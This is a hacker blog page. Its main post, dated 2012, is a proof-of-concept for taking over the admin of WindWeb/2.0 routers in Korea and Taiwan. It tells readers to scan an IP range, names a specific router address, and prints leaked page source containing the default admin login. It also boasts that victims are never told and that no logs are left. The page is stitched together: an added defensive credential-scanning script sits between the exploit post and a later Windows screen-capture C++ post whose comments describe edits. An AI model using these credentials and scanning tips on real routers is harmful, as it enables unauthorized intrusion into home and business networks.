
PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kept pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

I'll make it short and sweet, but, I can tell you NOW, this is usable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443, in which netgear, and obviously this brand, doesn't :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like, you will need to find your OWN index.html, as this MUST be simply changed, so, when you find, an example would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
their admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can be very VERY nice... but im not going to hand out a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220, is obv an adsl range and yea, what stupid ass server, runs a router admin on port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0
Connection: close
Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
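
The excerpt above shows the router's web page carrying account names and passwords as JavaScript string literals. As an added example (not part of the original post), here is an offline check a firmware or web UI maintainer could run over their own page source to catch that pattern; the name lists, function names and sample page are assumptions made for illustration, and the sample values are constructed.

```javascript
// Added example, not from the original post. Flags inline-script string literals
// assigned to credential-named variables; values are never echoed, only lengths.
const SECRET = /^(pass(wd|word)?|pwd|secret)$/i;   // heuristic name lists (assumed)
const ACCOUNT = /^(id|user(name)?|login)$/i;
// Matches  name = "literal"  and  name[0] = "literal"
const ASSIGN = /\b([A-Za-z_$][\w$]*)\s*(?:\[\s*\d+\s*\])?\s*=\s*(["'])((?:\\.|(?!\2)[^\\\n])*)\2/g;

function inlineScripts(html) {
  const blocks = [];
  const open = /<script\b[^>]*>/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    const close = /<\/script/gi;
    close.lastIndex = start;
    const c = close.exec(html);
    const end = c ? c.index : html.length; // unterminated block: scan to EOF
    blocks.push({ start, body: html.slice(start, end) });
    open.lastIndex = end;
  }
  return blocks;
}

function findEmbeddedCredentials(html) {
  const findings = [];
  for (const { start, body } of inlineScripts(html)) {
    const hits = [];
    let m;
    while ((m = ASSIGN.exec(body)) !== null) {
      const kind = SECRET.test(m[1]) ? 'secret' : ACCOUNT.test(m[1]) ? 'account' : null;
      if (!kind || m[3].length === 0) continue;
      const line = html.slice(0, start + m.index).split('\n').length;
      hits.push({ line, variable: m[1], kind, length: m[3].length });
    }
    // Account-like names alone (id = "main") are too noisy; report them
    // only when the same script also embeds a secret-like literal.
    if (hits.some((h) => h.kind === 'secret')) findings.push(...hits);
  }
  return findings;
}

// Constructed sample shaped like the excerpt in the post (values are made up).
const SAMPLE = [
  '<html><head>', '<SCRIPT LANGUAGE="JavaScript">',
  'var st_lan_ip = new Array(4)', 'st_lan_ip[0] = "192.0.2.1"', '<!--',
  'var id = new Array();', 'id[0]="acct-one"',
  'var pass = new Array();', 'pass[0]="not-a-real-secret"',
].join('\n');

console.log(findEmbeddedCredentials(SAMPLE));
```

Any finding means the page source hands those literals to whoever can load it, so the fix belongs in the firmware's page generation, not in the browser.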

screen capture for windows by Mouse

Posted on 17th September 2011 in Codes

This requires jpeglib, which you can get from http://www.ijg.org/
This is for Windows.


#include <stdio.h>
#include <windows.h>

extern "C"
{
#include <jpeglib.h>
}
#pragma comment(lib,"JpegLib.lib")

// Capture the desktop and write it to `filename` as a JPEG.
// Returns 0 on success, -1 if the file cannot be opened,
// -2 if the capture bitmap cannot be created.
int jpegCapture(const char* filename, int quality)
{
    HWND desktopWnd = GetDesktopWindow();
    RECT rc;
    GetWindowRect(desktopWnd, &rc);
    int width = rc.right - rc.left;
    int height = rc.bottom - rc.top;

    // Copy the desktop into an in-memory bitmap.
    HDC hDC = GetDC(desktopWnd);
    HDC hDCmem = CreateCompatibleDC(hDC);
    HBITMAP hBMP = CreateCompatibleBitmap(hDC, width, height);
    if(hBMP == NULL)
    {
        DeleteDC(hDCmem);
        ReleaseDC(desktopWnd, hDC);
        return -2;
    }
    HGDIOBJ oldBMP = SelectObject(hDCmem, hBMP);
    BitBlt(hDCmem, 0, 0, width, height, hDC, rc.left, rc.top, SRCCOPY);

    // Open the output file before creating any libjpeg state, so a
    // failure here only has the GDI objects to release.
    FILE* outfile = fopen(filename, "wb");
    if(outfile == NULL)
    {
        SelectObject(hDCmem, oldBMP);
        DeleteObject(hBMP);
        DeleteDC(hDCmem);
        ReleaseDC(desktopWnd, hDC);
        return -1;
    }

    // Set up the JPEG compressor for 24-bit RGB output.
    struct jpeg_compress_struct cinfo;
    struct jpeg_error_mgr jerr;
    cinfo.err = jpeg_std_error(&jerr);
    jpeg_create_compress(&cinfo);
    jpeg_stdio_dest(&cinfo, outfile);
    cinfo.image_width = width;
    cinfo.image_height = height;
    cinfo.input_components = 3;
    cinfo.in_color_space = JCS_RGB;
    jpeg_set_defaults(&cinfo);
    if(quality < 0) quality = 0;
    if(quality > 100) quality = 100;
    jpeg_set_quality(&cinfo, quality, FALSE);
    jpeg_start_compress(&cinfo, TRUE);

    // Convert each row of pixels to RGB triplets and hand it to libjpeg.
    JSAMPLE* scanline = new JSAMPLE[width*3];
    for(int posy = 0; posy < height; posy++)
    {
        for(int posx = 0; posx < width; posx++)
        {
            COLORREF pixel = GetPixel(hDCmem, posx, posy);
            scanline[posx*3+0] = GetRValue(pixel);
            scanline[posx*3+1] = GetGValue(pixel);
            scanline[posx*3+2] = GetBValue(pixel);
        }
        jpeg_write_scanlines(&cinfo, &scanline, 1);
    }
    jpeg_finish_compress(&cinfo);
    jpeg_destroy_compress(&cinfo);

    // Release everything: array delete for the scanline buffer, then
    // the file, then the GDI objects (the original leaked the bitmap).
    delete[] scanline;
    fclose(outfile);
    SelectObject(hDCmem, oldBMP);
    DeleteObject(hBMP);
    DeleteDC(hDCmem);
    ReleaseDC(desktopWnd, hDC);
    return 0;
}

int main() {
    printf("Jpeg screen cap\n");
    // Propagate the capture result as the process exit code.
    return jpegCapture("lol.jpg",100);
}